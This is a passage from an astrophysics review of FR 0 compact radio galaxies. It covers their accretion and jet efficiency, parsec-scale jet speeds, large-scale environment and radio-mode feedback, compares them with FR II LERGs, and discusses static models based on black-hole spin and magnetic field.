jets, \(L_{\rm Mech}\) has been estimated by using different assumptions. Monochromatic radio luminosity represents only a small fraction of the energy carried by the jets, about 2 orders of magnitude smaller than total \(L_{\rm mech}\)(Scheuer, 1974). However, recalibrating this relationship with physical constraints (e.g. synchrotron spectral ageing, radiative loss, content of particles and magnetic fields) has yielded to \[L_{\rm mech}=7\times 10^{36}f(L_{\rm 1.4\,GHz}/10^{25}\,W\,Hz^{-1})^{0.68}\,W \tag{3}\] estimated by Heckman and Best (2014). This relation was obtained by studying the jet mechanical energy as \(pV\) work done by the jet to inflate cavities found in hot X-ray emitting halos (Rafferty et al., 2006; Birzan et al., 2008; Cavagnolo et al., 2010). The jet energy can also be estimated from synchrotron emission using the minimum energy condition in the radio lobes in an equipartition regime (i.e. the internal energy is almost equally divided between mag netic field and relativistic particles) (Willott et al., 1999; O'Dea et al., 2009; Daly et al., 2012). The \(f\) factor includes all the uncertainties on the physical state of the lobes, such as for example the particle composition, SED, volume filling factor, possible deviation from the equipartition and adiabatic condition, turbulence, additional heating from shocks. Heckman and Best (2014) adopted \(f=4\) based on the best linear relation of the data. We note that these empirical assumptions, set on samples of FR Is and FR IIs, may not be entirely applicable to FR 0s (Grandi et al., 2021). However we choose to use this value to be consistent with previous works on low-power RGs (e.g. Heckman and Best 2014). Left panel of Fig. 12 depicts the Eddington ratio (\(L_{\rm Bol}/L_{\rm Edd}\)) distributions for FR0CAT, FRICAT and CoreG galaxies. FR 0s and FR Is have similar rates, \(10^{-5}\,\)-\(\,10^{-2}\). A Kolmogorov--Smirnov (KS) statistic test confirms that two distributions are not drawn from different populations with a probability \(P=0.0059\). Conversely, CoreG have significantly lower accretion rates \(<10^{-4}\). Since a large amount of the falling gas is launched into the jet without feeding the BH (Zanni et al., 2007), another method to estimate the total accretion is by adding the jet kinetic power to the radiative power as follows \(\dot{L}_{\rm E,tot}=(L_{\rm Bol}+L_{\rm Mech})/L_{\rm Edd}\). The right panel of Fig. 12 shows the distribution of this total accretion rate estimator for the different groups of sources. The CoreG generally have lower total accretion rates than the FR 0s and FR Is. However, there is a considerable overlap between the populations of FR 0s and FR Is, \(\dot{L}_{\rm E,tot}\sim 10^{-4}\,\)-\(\,10^{-2}\). A KS test confirms that the cumulative distribution function of FR0s is not significantly different from that of FR Is (\(P=5.0\times 10^{-17}\)). These results confirm the X-ray study from Torresi et al. (2018) that FR 0 BHs are fed at low rates, consistent with a jet-mode AGN and RIAF-type accretion states (Heckman and Best, 2014). CoreG, being low-power FR 0s, also have lower accretion rates than FR0CAT objects. Figure 12: Histograms of BH accretion rates estimated as Eddington ratio, \(\rm L_{\rm Bol}/L_{\rm Edd}\) (left panel), and as total accretion rate, (\(\rm L_{\rm Bol}+L_{\rm Mech}\))/\(\rm L_{\rm Edd}\) (right panel) for FR0CAT objects (black solid line), FRICAT objects (red dashed line) and CoreG (green dot-dashed line). Broad-band proxies for accretion and kinetic jet powers are expected to broadly correlate in RLAGN, corresponding to two parallel empirical relations valid for the two accretion states (e.g. Rawlings and Saunders, 1991; Willott et al., 1999; Buttiglione et al., 2010; Capetti et al., 2023). For AGN-dominated RLAGN (HERGs), the correlation between radio and optical (continuum) or X-ray emission probably results from a combination of thermal and non-thermal emission from disc and jet (e.g., Chiaberge et al., 2002; Hardcastle and Worrall, 2000; Baldi et al., 2019). For jet-dominated RLAGN (LERGs), the correlation between two luminosity proxies is best explained as the result of a single emission process in the two bands10, i.e. non-thermal synchrotron emission from the relativistic jet (e.g., Chiaberge et al., 1999; Balmaverde et al., 2006; Mingo et al., 2014), launched by a RIAF disc as supported by multiple theoretical and analytical studies (e.g. Meier, 2001; Begelman, 2012; McKinney et al., 2012). This result has also been found valid for low-luminosity AGN, where compact jet dominates the broad-band continuum emission (e.g. Nagar et al., 2002; Ho, 2008; Fernandez-Ontiveros et al., 2023). Balmaverde et al. (2008) found that for 3C/FR Is and CoreG the accretion power correlates linearly with the jet power, with an efficiency of conversion from rest mass into jet power of \(\sim\)0.012. An [O III]-radio correlation found for FR Is, FR 0s, CoreG, and RL low-power LINERs (e.g. Verdoes Kleijn et al., 2002; Nagar et al., 2005; Balmaverde and Capetti, 2006; Baldi et al., 2015, 2019, 2021b, see also Fig. 9) Figure 13: Parsec-scale core radio power (erg s\({}^{-1}\) Hz\({}^{-1}\)) vs. [O III] line luminosity (erg s\({}^{-1}\)) for different samples of LINER-type RLAGN hosted in ETGs with core-brightened morphologies (see the legend): FR 0s (red filled dots) from Cheng and An (2018); Cheng et al. (2021); Baldi et al. (2021); Giovannini et al. (2023), RL LINERs from the Palomar sample from Ho et al. (1995) (green empty dots), 3C/FR Is (upwards orange triangles), Core Galaxies (downward pink triangles). The dotted line indicates the best linear correlation. suggests a similar ionising central source, where a scaled-down accretion rate for the core-dominated sources explains a likewise scaled-down jet power with respect to the more powerful 3C/FR Is (Balmaverde et al., 2008). By focusing on the parsec-scale radio emission, the higher resolution of VLBI observation probes a section of the jet base 'closer' to the launching site, which is thus more sensitive to the BH-accretion properties, than that detected with the VLA at arcsec resolution. In fact, an analogous \(L_{\rm[O~{}III]}\)-\(L_{\rm VLBI~{}core}\) correlation has been reported by Baldi et al. (2021) over \(\sim\)4 orders of magnitudes (Fig. 13) for RGs with comparable properties, e.g. hosted in massive ETGs and characterised by a LINER spectrum (FR I, FR 0s, CoreG, RL LLAGN). By also including the new VLBI data for FR 0s from Giovannini et al. (2023), we fit the data points present in this sequence with a power-law relation. We find a robust correlation in the form \(L_{\rm[O~{}III]}\propto L_{\rm VLBI~{}core}^{0.58\pm 0.06}\) with a Pearson correlation coefficient of 0.767 which indicates that the two quantities do not correlate with a probability smaller than \(8\times 10^{-14}\). This statistically-robust relationship corroborates the idea that the model of RIAF disc with core-brightened jets of FR Is is also applicable to FR 0s and LINER-like RLAGN in general. The large scatter of the correlation, \(\sim\)0.28 dex, could be caused by Doppler boosting, nuclear variability and non-flat spectral index (1.4 - 8 GHz). However, there is no clear evidence for strong Doppler-boosted effect in FR 0s (higher radio luminosities than implied by the linear correlation) for the one-sided jets or highly variable sources, suggesting that the jet spine is not highly relativistic and/or prominent (see Sect. 12 for more discussion on jet structure). Figure 14: The core dominance measured as ratio between VLA 5-GHz core and NVSS 1.4-GHz flux densities for FR0CAT sources (black filled dots), FRICAT sources (red circles) and CoreG (green squares) as function of total accretion rate (L\({}_{\rm Bol}\) + L\({}_{\rm Mech}\))/L\({}_{\rm Edd}\). We exclude sources with core dominance \(>\)1 because probably affected by variability or systematic errors. The accretion-ejection coupling can also be explored by comparing the core dominance, a proxy of the jet brightness structure (i.e. how much the core shines over the extended jet emission), with the total accretion rate, \(\dot{L}_{\rm E,tot}\). Figure 14 presents the distribution of these two quantities for FR0CAT, FRICAT and CoreG galaxies (excluding the few sources with core dominance \(>\)1 possibly due to variability or systematic errors). Although the core dominance naturally saturates at 1 as the source becomes weaker (and radio spectrum flatter, Dabhade and Gopal-Krishna, 2023), there is a general tendency for RGs to increase their core dominance with decreasing accretion rate. These results suggest that the capability of a RG to develop kpc-scale structures is related to accretion properties: more core brightened structures are associated with lower-\(\dot{m}\) sources. The jet efficiency, i.e. the fraction of the kinetic jet power produced with respect to the AGN accretion power, offers a good diagnostic to investigate the nature of the nuclei of RGs. The \(L_{\rm Mech}/L_{\rm Bol}\sim\eta/\epsilon\) ratio (\(\eta\) and \(\epsilon\) are the fraction of gravitational energy converted into jet power and thermal radiation, respectively) directly measures the ability of the system to channel gravitational energy into the jet rather than to dissipate it in thermal radiation. Figure 15 depicts \(\eta/\epsilon\) for FR0CAT, FRICAT and FRIICAT objects (Grandi et al., 2021). Neglecting the \(f\) and \(M_{\rm BH}\) effect on the jet efficiency, Figure 15: \(L_{\rm 1.4\,GHz}/L_{\rm Edd}\) versus \(L_{\rm[O\ III]}/L_{\rm Edd}\) of FRCAT sources (FR 0, FR Is and FR IIs) compared to the predicted values of kinetic jet power estimated by Equation 3 assuming \(f=5\). Each line in the plots corresponds to a different value of \(\eta/\epsilon\). Since a change of the BH mass can have a minor impact on the predicted \(\eta/\epsilon\) curves, we plot (solid and dotted) lines corresponds to \(M_{\rm BH}=10^{7.5}\) and \(M_{\rm BH}=10^{9.5}\)\(M_{\odot}\). Image reproduced with permission from Grandi et al. (2021), copyright by the author(s). whereas HERGs favour a thermal dissipation of the gravitational power, different LERG types, powered by similar inefficient accretion flows, launch jets with different luminosities and different jet efficiencies: FR 0s appear less efficient in extracting energy from the BHs into the jets than FR Is. At parsec scale, a comparison between FR 0 and classical 3C/FR I jets can help us understand the reason why FR 0s do not develop large structures. 3C/FR Is generally exhibit core-brightened radio morphologies with VLBI observations (Fanti et al., 1987; Venturi et al., 1995; Giovannini et al., 2005) and FR 0s show occasionally similar morphologies when resolved. However, the degree of jet asymmetry and the ratio between one-sided and two-sided jets appears different between the two classes. In FR Is, the effect of Doppler boosting on the jet sidedness, i.e. the jet-to-counter-jet flux ratio, decreases from VLBI to VLA observations and is typically larger than 3 at parsec scale (Bridle, 1984; Parma et al., 1987; Giovannini et al., 1990; Venturi et al., 1995; Xu et al., 2000; Giovannini et al., 2001). On the basis of the presence of a link between jet speed and asymmetry, this result is interpreted as a change of the FR I jet bulk speed from relativistic, \(\Gamma>\)3, to sub-relativistic speeds on kpc scales by decelerating, possibly due to entrainment of external material (Bicknell, 1984, 1995; Bowman et al., 1996; Laing and Bridle, 2014; Perucho et al., 2014). For FR 0s the jet sidedness is less prominent: only one third of FR 0s has jet sidedness larger than 2 at parsec scale (Fig. 16). This is a clear observational evidence that the jet bulk speed of FR 0s is significantly smaller than that of FR Is. Following the procedure discussed by Bassi et al. (2018), we can roughly estimate the bulk Lorentz \(\Gamma\) factor of the jet, but with a strong assumption on the unknown orientation: the \(\Gamma_{\rm bulk}\) for the angle of the jet to the Figure 16: Distributions of the logarithm of the \(R_{\rm JC}\), the jet-to-counter-jet flux ratio for the FR 0 (top panel) from Giovannini et al. (2023) and FR I/FR II RGs from the Bologna Complete Sample (BCS, bottom panel, from Liuzzo et al. 2009). The dashed histograms correspond to lower limit on the jet sidedness. Image reproduced with permission from Giovannini et al. (2023), copyright by the authors. line of sight \(\theta_{m}\) that maximizes \(\beta=v/c\). With these assumptions, considering the range of jet sidedness observed \(<10\), \(\Gamma_{\rm bulk}\) for FR 0s is typically \(<\)2.5. This result concurs with the low jet proper motions studied by Cheng and An (2018) and Cheng et al. (2021). In conclusion, although FR 0 and FR Is share comparable accretion properties, the jets of the former appear less efficient and slower, mildly relativistic at parsec scales with a bulk velocity which does not exceed 0.5\(c\). However, a proper systematic analysis on larger samples of FR 0s is needed to draw a final conclusion on their accretion-ejection state. ## 9 Environment The kpc- and Mpc-scale environmental properties (e.g. clustering, ICM, location within the cluster/group, relative galaxy velocity) can regulate the accretion and ejection states of an active BH: e.g. bright cluster galaxies at the centre of dense environments typically host a RG and have different merger histories and fueling properties than galaxies at the cluster outskirts moving away from the centre (e.g. Lin et al., 2010; Vattakunnel et al., 2010; Shlosman, 2013; Kormendy and Ho, 2013; Conselice, 2014). The understanding of the relationship between RLAGN activity and their environment is essential for a comprehension of BH-host evolution, AGN triggering and life cycles, and for calibrating feedback processes in cosmological models (e.g., Husko et al., 2023). However, the role of the environment in shaping RLAGN is still not clear (e.g. Best, 2004; Ineson et al., 2013, 2015; Ching et al., 2017; Macconi et al., 2020). The FR I/II dichotomy is believed to depend on jet interaction with the environment (e.g. Laing et al., 1994; Kaiser et al., 1997), or due to host properties (Ledlow and Owen, 1996), apart from mechanisms associated with jet production itself (e.g. Meier, 2001). At small scales, the similarity between the host types of FR 0s and FR Is suggests that the galactic gas conditions between the two classes are rather comparable. Precisely, the smaller optical host masses of the FR 0s than those of FR Is argue against the idea of a dense galaxy-scale environment which could cause the jet deceleration and disruption through the interaction with ISM (Kaiser and Best, 2007). No evidence of a denser hot-gas halo with respect to that of FR Is hosts, which typically permeates the atmosphere of elliptical galaxies, can be inferred from the sparse X-ray studies of FR 0s. The large-scale environment is typically invoked to explain the deceleration and confinement of FR I jets with respect to FR IIs, since FR Is typically reside in denser environment (denser coronae and richer groups/cluster, e.g. Prestage and Peacock, 1988; Hill and Lilly, 1991; Zirbel, 1997; Gendre et al., 2013; Laing and Bridle, 2014; Massaro et al., 2019, 2020). Several studies on the Mpc-scale environment of RL CRSs have confirmed that they inhabit dense environment, but the presence of environmental differences with respect to FR Is have been questioned. Torresi et al. (2018) found that at least 50% of the FR0s live in a dense X-ray environment, which reflects massive dark matter halos in which these objects are embedded. Vardoulaki et al. (2021), studying the VLA-COSMOS Large Project, found that FR I/IIs and compact AGN are found in all types and density environments (group or cluster, filaments, field), regardless of their radio structures. Miraghaei and Best (2017) only found a marginal trend of RL CRSs in denser environments. In this direction, Capetti et al. (2020) found that FR0CAT sources do indeed live in rich environment but with lower density by a factor of 2 on average, than FR Is, and that about two thirds of FR 0s are located in groups containing \(<\)15 members. A similar result was found by Prestage and Peacock (1988) who argued that RL CRSs lie in regions of lower galactic density than extended sources. In addition, Massaro et al. (2020) concluded that nearby BL Lacs share similar clustering properties with FR 0s, suggesting a common parental population. In conclusion, there is growing evidence of an environmental difference (at least at large scales) between FR 0s and FR Is (and extended RGs in general), which would imply a different cosmological evolution between the two classes. ## 10 Feedback AGN feedback comes in two flavours: quasar and radio (or maintenance) mode (e.g. see Croton et al., 2006; Best, 2007; Fabian, 2012; Bower et al., 2012; Heckman and Best, 2014; Harrison, 2017). While the former mode is associated with powerful radiatively dominated AGN, i.e. quasars (and HERGs), associated with high Eddington ratios (\(\dot{L}_{E}>\) 0.01), the radio mode is attributed to BHs with low accretion rates (\(\dot{L}_{E}<\) 0.01, mainly LERGs). The latter releases most of their energy in the form of jets, preventing strong cooling flows in galaxy clusters (e.g. Fabian et al., 2003), and regulating the level of SF in their host galaxies (e.g. Best et al., 2006). It is only with the advent of deep multi-band radio surveys, with their combination of high sensitivity to both compact and extended emission (Shimwell et al., 2017) that we are now able to systematically study the effects of galactic-scale feedback from RL CRSs (e.g. Bicknell et al., 2018). In opposition, powerful quasars have jets that rapidly "drill" through the ISM, depositing most of the energy in the intergalactic medium. Observational evidence continues to mount that lower-power (\(L_{\rm 1.4\,GHz}\lesssim 10^{24}\,{\rm W\,Hz}^{-1}\)) jetted AGN may have a significant impact on their hosts through jet-ISM interactions on small (\(\sim\)1-10 kpc) scales, where the jets heat, expel, or shock the ambient ISM, thereby altering the SF efficiency (e.g., Nyland et al., 2013; Jarvis et al., 2019, 2021; Webster et al., 2021, 2021; Grandi et al., 2021; Venturi et al., 2021). State-of-the-art jet simulations (e.g. Sutherland and Bicknell, 2007; Wagner and Bicknell, 2011; Mukherjee et al., 2016, 2018; Bicknell et al., 2018; Rossi et al., 2020; Talbot et al., 2022; Tanner and Weaver, 2022) provide further support to this scenario, demonstrating that lower-power jets are susceptible to disruption and entrainment, which increases the volume and timescale of the feedback, as well as the amount of energy transferred to the ISM (\(>\) 5-10% of bolometric power). FR 0s, showing galaxy-scale jetted emission, could play a critical role in the radio-mode feedback. In fact, they are the best candidates to offer continuous energy injection into the ISM, although at low regimes (\(\dot{L}_{E}<0.02\)), but fully inserted in the host and with most of the energy deposited in the ISM, on smaller physical (galactic medium) scales than those (inter-galactic medium) affected by the full-fledged jets of FR I/IIs. Nevertheless, the role of FR0s and the jetted population of LLAGN in general in the context of feedback has just started to be explored (e.g., Kharb and Silpa, 2023; Krause, 2023; Goold et al., 2023). Vardoulaki et al. (2021) showed a comparable radio-mode quenching of SF in the hosts of RL CRSs and of FR I/IIs. In fact, while compact RGs can also be found in less massive hosts (\(10^{9.5}\,-\,10^{11.5}\,M_{\odot}\)) than FR I/IIs, the former also have low specific SF rates and large time from the last burst of SF derived from SED fitting (Delvecchio et al., 2017) similar to those of the latter. RL CRS hosts lie in cooler X-ray groups than extended RGs with average inter-galactic medium temperatures of \(\sim\)1 keV. Additionally, the older the episode of SF, the cooler the X-ray group in which RL CRSs lie, suggesting a SF shutdown by kinetic feedback. A dense cold- or hot-phase in the ISM can increase the chances of detecting signatures of an active radio-mode feedback. Best et al. (2000) showed that compact radio sources smaller than 90 kpc have emission line nebulae with lower ionization, higher luminosity, and broader line widths than in larger radio sources, consistent with shocks driven by the jets or outflows, typically observed in dust-shrouded young RGs. Low-luminosity jet can also carry enough power to shock and remove the cold/hot gas (e.g. Morganti et al., 2018, 2021; Murthy et al., 2022), as demonstrated by some cases with observed disturbed gas kinematics, absorption features and LINER-like line emission in compact sources (e.g. Holt et al., 2008; Glowacki et al., 2017; Baldi et al., 2019; Tadhunter et al., 2021). The detection of X-ray cavities in low-power RLAGN (\(<10^{23}\,\mathrm{W}\,\mathrm{Hz}^{-1}\)) demonstrates the ability of their jets to inflate bubbles in the hot-gas atmosphere (Birzan et al., 2004; Allen et al., 2006). Nevertheless, ordinary FR 0s are not expected to drive strong outflows in dense ISM. The first dedicated study which has observationally addressed the radio-mode feedback for FR 0s is by Ubertosi et al. (2021), who found two putative Figure 17: Panel a: Chandra image (0.5–2 keV) of the cluster A795; the ICM peak and the position of the FR 0 are indicated. Panel b: ICM brightness profile model subtracted to the Chandra image over the same region of panel a. Panel c: Temperature map of A795. In each panel, the arrows highlight the ICM spiral geometry. Image reproduced with permission from Ubertosi et al. (2021), copyright by the author(s). X-ray cavities and two prominent cold fronts possibly associated with the jet activity of a FR 0 (with a bolometric luminosity of the order of \(10^{40}\,\rm erg\,s^{-1}\)), associated with a brightest cluster galaxy (cluster Abell 795) (Fig. 17). The estimated cavity power and the cooling luminosity of the ICM follow the well-known scaling relations (e.g. McNamara and Nulsen 2007, 2012), providing a strong evidence for the self-regulated feedback in this source. Being fuelled by the inflow of a cold spiral-shape ICM, the central AGN inflate radio cocoons that excavate X-ray depressions and drive shocks in the ICM which slosh and heat gas, establishing a feedback loop. However, a systematic study of the feedback for a large sample of FR 0s is still missing, mainly because of the great difficulty to detect low-brightness X-ray cavities related to small jets. To roughly estimate the impact of FR 0 jets on galaxies, assuming that the X-ray atmosphere is regulated by the jet activity, we compare the internal energy within the jets with the energy of the hot X-ray emitting gas in the host, similar to the analysis performed by Webster et al. (2021) for galaxy-scale jets. First, to calculate the jet energetics, we assume that the radio emission comes from a cylindrical region of 5\({}^{\prime\prime}\) long with a radius of 0.3\({}^{\prime\prime}\) (radio observation based, Baldi et al. 2019). By using a Python code (pysynch11, Hardcastle et al. 1998) we derive the minimum energy density and the minimum total energy, which is of the order of \(\sim 5\times 10^{48}\) - \(10^{50}\) J, by considering radio flux densities between 5 and 500 mJy, consistent with FR0CAT sources. Second, to estimate energy within the hot ISM, several assumptions are needed. Since the small jets of FR 0s should have a larger impact on the bulge, we estimate the bulge mass from the BH mass distribution of FR0CAT, \(10^{7.5}\) - \(10^{9}\,M_{\odot}\), using the McConnell and Ma (2013) scaling relation for ETGs. Then we fix the hot gas mass fraction to 5% (e.g., Dai et al. 2010; Trinchieri et al. 2012). Then assuming an average particle mass of \(0.62\,m_{\rm proton}\) and a typical gas temperature of 0.5 keV (Goulding et al., 2016), we are able to estimate the internal energy of the hot phase in the bulge, which is of the order of \(\sim 10^{50}\) - \(3\times 10^{51}\) J. Finally, the total jet energy of FR 0s turns out to be \(\sim\)3-5% of the total binding energy of the bulge. However, bear in mind that minimum jet energy estimates represent only a lower limit, since the jets must also displace the ISM and produce shocks and its enthalpy for a relativistic gas undergoing adiabatic expansion could be \(>4pV\)(Birzan et al., 2004; Croston et al., 2007; Hardcastle and Krause, 2013). In addition, the internal estimated jet energy could be lower than the kinetic jet energy, which can be calculated by using the method by Willott et al. (1999) by using the 151-MHz luminosity. In fact, by considering the LOFAR 150-MHz luminosity of the FR0CAT, \(10^{38}\) - \(10^{40}\,\rm erg\,s^{-1}\), the jet output is of the order \(1\times 10^{43}\) - \(4\times 10^{44}\,\rm erg\,s^{-1}\). This evaluation also considers the uncertainties on the factor \(f\) (\(<\)20, Hardcastle et al. 2007 for FR Is), which includes the effect from the jet structure and its environment (Willott et al., 1999). Assuming a lifetime of the jet activity of \(10^{7}\) yr, the kinetic jet energy would range \(\sim 3\times 10^{50}\) - \(6\times 10^{51}\) J. These can be considered as upper limits of the jet energetics. In this case, the ISM energy would balance jet energetics. We conclude that the FR0 jets are potentially capable of affecting the ISM properties, at least in the bulge. Current hydrodynamical simulations (Horizon-AGN, Dubois et al. 2014; Illustris, Vogelsberger et al. 2014; EAGLE, Schaye et al. 2015; MUFASA, Dave et al. 2016; SIMBA, Dave et al. 2019; SWIFT, Schaller et al. 2023) implement quasar- and radio-mode feedback with a typical efficiency of 5-10%, assuming that the energy deposited back into the ISM, scales directly with accretion rate. The ratio (\(\rm L_{Mech}\))/(\(\rm L_{Bol}\)+\(\rm L_{Mech}\)) provides a measure of the fraction of the total accreted energy released back into the ISM in mechanical form in jets. We measured this ratio for FR 0 and FR Is from FRCAT and found that all deposit more than 10% (on average 30% for FR 0s) of their accreted energy back into the galaxy. This calculation confirms the result from Whittam et al. (2018, 2022) that LERGs in general have higher feedback efficiencies and thus thought to be more responsible for the maintenance mode of mechanical feedback than HERGs, which, as more powerful FR IIs on average than LERGs, generally deposit their energy at larger distances in the ICM. ## 11 Comparison with FR II LERGs Deep optical-radio surveys have unearthed a large population of low-luminosity FR II LERGs (Capetti et al., 2017; Jimenez-Gallardo et al., 2019; Webster et al., 2021), which show kpc-scale edge-brightened radio morphologies, smaller (\(>\)30 kpc) and less luminous (\(\sim 10^{41}\,\rm erg\,s^{-1}\)) than the Mpc-scale powerful 3C/FR II LERGs. Their nuclear properties (luminosity, accretion rates) can still be reproduced by a RIAF disc, consistent with the general jet-mode LERG population (Heckman and Best, 2014). Macconi et al. (2020) suggested that FR II LERGs are characterised by intermediate properties between FR Is and FR II HERGs, since they populate an intermediate region of a correlation between accretion rates and environmental richness. Conversely, Capetti et al. (2023) found FR II LERGs are among the most luminous radio sources in the Universe (up to radio power \(10^{35}\,\rm erg\,s^{-1}\) Hz\({}^{-1}\)). Tadhunter (2016) argued that FR II LERGs represent a phase of the RG evolution, when the accretion has recently switched off or leveled down from an FR II HERG high state, after exhausting the cold gas. However, preliminary studies on the properties of the warm ionised and cold molecular gas in RGs (Balmaverde et al., 2019; Torresi et al., 2022) possibly rule out the presence of a statistical difference between FR II LERGs and HERGs, weakening the evolution scenario and, instead, suggesting that jet properties in powerful FR IIs do not depend on the accretion mode or the disc structure (Capetti et al., 2023). The connection between FR 0 and FR II LERGs is established by their common affinity with FR Is, since they all share a LERG optical spectrum and are generally interpreted to be jet-dominated RGs powered by a RIAF disc. In fact, Baldi et al. (2018) envisaged that FR 0s, FR Is and FR II LERGs belong to a single continuous population, with similar BH mass, galaxy and accretion properties, regardless of their different jet morphologies. Differences related to intrinsic intimate BH properties (spin and magnetic field at its horizon, and marginally different BH mass) shape the whole LERG population (Miraghaei and Best, 2017; Grandi et al., 2021): when these parameters are maximized, highly relativistic jets are launched and form full-fledged FR I/FR II LERGs, while FR 0s would originate from less extreme values of these parameters (see Baldi et al. 2018 and Sect. 12 for discussion). ## 12 Models for FR 0s Here we will discuss two possible scenarios to account for the multi-band results on FR 0s where the jet and nuclear properties of FR 0s 1) are intrinsically different from those of the other FR classes and do not evolve; 2) evolve within a context of RLAGN population where FR 0 represents a particular phase of this evolution. ### Static scenarios In a non-evolutionary scenario, where the intrinsic properties of the FR 0 class remain unchanged across their lifetime, we will review the main features which can determine the accretion and ejection in FR 0s in relation to FR Is. Magneto-hydrodynamic simulations of jet launching (e.g. McKinney and Gammie 2004; Hawley and Krolik 2006; McKinney 2006; Tchekhovskoy et al. 2011) predict the formation of a light, relativistic outflow powered by the rotational energy of the BH, as described in the work of Blandford and Znajek (1977) (BZ), as well as of a heavier and mildly relativistic outflow powered by the accretion disc, as originally proposed by Blandford and Payne (1982) (BP). LERGs, which are jet-dominated sources, are generally interpreted as BZ powered, while HERGs, which have quasar-type discs, are generally interpreted as powered by BZ and BP for the presence of both relativistic jets and strong outflows (Heckman and Best, 2014). FR 0s as well as FR Is are expected to launch BZ jets (with a possible contribution from a BP process for the outer jet layer in case of a stratified jet, see below). For RLAGN jets generated by BZ-type process in RIAF discs (Tchekhovskoy et al., 2011; Liska et al., 2022), the ratio of jet and accretion powers (jet efficiency) is maximum when the BH is both rapidly spinning and has accumulated a substantial amount of large-scale poloidal magnetic flux by accretion (see e.g. Komissarov 2001; Tchekhovskoy et al. 2010). The BZ jet power does not directly depend on the accretion rate, but the outflowing plasma is surely a fraction of the accreting flow. As discussed in Sect. 8, although they can share similar accretion rates, core-dominated RGs and FR 0s show a less jet efficiency than more powerful FR Is. The small fraction of plasma within the disc that is actually channeled into the jet could justify the paucity of matter to accelerate to relativistic speeds in the FR 0 jets. The BZ jet power depends on \(M_{\rm BH}\), the magnetic field strength \(B\) threading the BH and the magnitude of its spin \(\bar{a}\)(Chen et al., 2021). In Newtonian physics, in a ballistic model, the jet height is proportional to the ratio of initial speed to gravity. Since the gravity is proportional to the BH mass and the initial jet speed is set by BZ process as the \(\sim E_{\rm kin}^{1/2}\bar{a}^{2}M_{\rm BH}^{2}B^{2}\), the maximum jet length is \(\sim\bar{a}B\). This mathematical approximation suggests that the limited length of FR 0 jets could, in fact, depend on spin and magnetic field. \(M_{\rm BH}\), the mass of the central compact object is often used as an indicator of BH activity as AGN are preferentially associated with massive systems (e.g., Chiaberge and Marconi, 2011). The jet power roughly establishes the likelihood of the source being radio-jet dominated (Cattaneo and Best, 2009). Kinetic jet power and BH masses are connected in radio active nuclei, as AGN tend to become more radio powerful (i.e. more radio loud) at larger BH masses (e.g. Best et al., 2005). Furthermore, the \(L_{\rm mech}\)-\(M_{\rm BH}\) relation mirrors the mass dependence on the accretion rate estimated with the Bondi accretion flow expected from the hot hydrostatic gas halos surrounding the galaxies (e.g. Allen et al., 2006; Balmaverde et al., 2008). The slightly smaller BH masses of FR 0s can constitute a limit on the jet power, but cannot simply justify the substantial lack of extended jet emission. **Magnetic field**\(B\), plays a primary role in the processes of jet formation, acceleration, and collimation (e.g. Blandford and Znajek, 1977; Blandford and Payne, 1982; Nakamura et al., 2001; Lovelace et al., 2002). Its azimuthal and poloidal components, originated by rotation of the accretion disc and BH, are required to form and then hold the jet, which extracts angular momentum from the disc surface by torque. The magnetic field integrated on BH horizon sets the jet power. The magnetic flux paradigm by Sikora and Begelman (2013) suggests that the radio loudness is determined by the deposition of magnetic flux close to the BH, which occurs more efficiently during the hot RIAF-type (ADAF) phase and facilitates the jet launching. In fact, as counter-example to stress the important role of \(B\) in jet production, the low magnetic field strength measured with VLBI in the the radio-intermediate quasar III Zw 2 has possibly determined its failure to develop a powerful jet (Chamani et al., 2021). The amount of magnetic flux accumulation and the geometry of the external field can differentiate between powerful and weak RGs, including FR 0s (O'Sullivan et al., 2015; Grandi et al., 2021). Moderate jet activity as in FR 0s can also be triggered by the dissipation of turbulent fields in accretion disc coronae (Balbus and Hawley, 1991; Brandenburg et al., 1995). In conclusion, a low intensity of the magnetic field structure of FR 0s represents a plausible scenario to describe their limited jet capabilities, although there is not still clear evidence. **BH spin**\(\bar{a}\), is the primary ingredient in separating the formation of different jets: the spin paradigm for AGN (Sikora et al., 2007; Garofalo et al., 2010) is a phenomenological scale-invariant framework based on BH-disc parameters for understanding BH feeding, feedback and jet launching mechanisms across the BH mass scale. This model, also named gap paradigm, involves the physics of energy extraction from BH via the BZ effect, the extraction of accretion disc rotational energy via BP jets and disc winds (Pringle, 1981; Kuncic and Bicknell, 2004, 2007). The total outflow power (BZ jet, BP jet, disc wind) is based on the size of the gap region between the BH event horizon and the disc. The BH spin still mediates launching the jet and determines the upper bound on the radio loudness (Sikora et al., 2007). Retrograde and prograde BH spin configuration with the accreting material rotating opposite or parallel to the direction of the BH can determine the gap region and so jet power: high retrograde BH spin for greater jet power and low spinning prograde BHs for weak jets (Garofalo, 2009). The latter scenario would fit with the FR 0 class. Recently, in the framework of BZ jet model, it has been found that the measured poloidal jet magnetic field \(\phi_{\rm jet}\) threading a BH (Narayan et al., 2003; Tchekhovskoy et al., 2011; McKinney et al., 2012; Yuan and Narayan, 2014) correlates over seven orders of magnitudes with the disc luminosity for a sample of aligned and misaligned RLAGN, in the form \(\phi_{\rm jet}\sim L_{\rm Bol}^{1/2}M_{\rm BH}\)(Zamaninasab et al., 2014), as predicted by a MAD model. This relation suggests that the magnetic field twisted by the rotation of the BHs which powers the BZ jets, dominates the plasma dynamics of the MAD disc, prevents the gas infall, and slows down the rotation by removing angular momentum into collimated relativistic outflow. Although we cannot directly measure field strength at the BH horizon \(\phi_{\rm BH}\), this quantity is the same as \(\phi_{\rm jet}\) by the flux freezing approximation for BZ jets. Assuming that \(\phi_{\rm jet}\) is set by the BZ mechanism, \(\phi_{\rm jet}\sim L_{\rm jet}^{1/2}\bar{a}^{-1}M_{\rm BH}^{-1}\), and the empirical relation from Zamaninasab et al. (2014), we can derive a rough estimate of the BH spin as \(\bar{a}\sim L_{\rm Mech}^{1/2}M_{\rm BH}^{-2}L_{\rm Bol}^{-1/2}\) by deriving accretion and jet power, respectively, from [O III] and radio luminosities (Eq. 3). This approximate calculation performed for the FR0CAT and FRICAT leads to the conclusion that FR 0s have on average a smaller BH spin than those of FR Is by a factor 0.7\(\pm\)0.3. A similar result is obtained if the BH spin is estimated by using the empirical correlation with jet power (Narayan and McClintock, 2012). The smaller BH spin of FR 0s would reflect to a lower bulk Lorentz factor \(\Gamma\) than those of FR Is, as suggested by Baldi et al. (2015, 2019). The maximisation of the BH parameters (M\({}_{\rm BH}\), B, \(\bar{a}\)) would lead to high-\(\Gamma\) jets with a FR I/II morphology. This is in line with theoretical works which suggest a link between BH spin and jet speeds (e.g. Thorne et al. 1986; Meier 1999; Maraschi et al. 2012; Chai et al. 2012). While an initial disc-jet 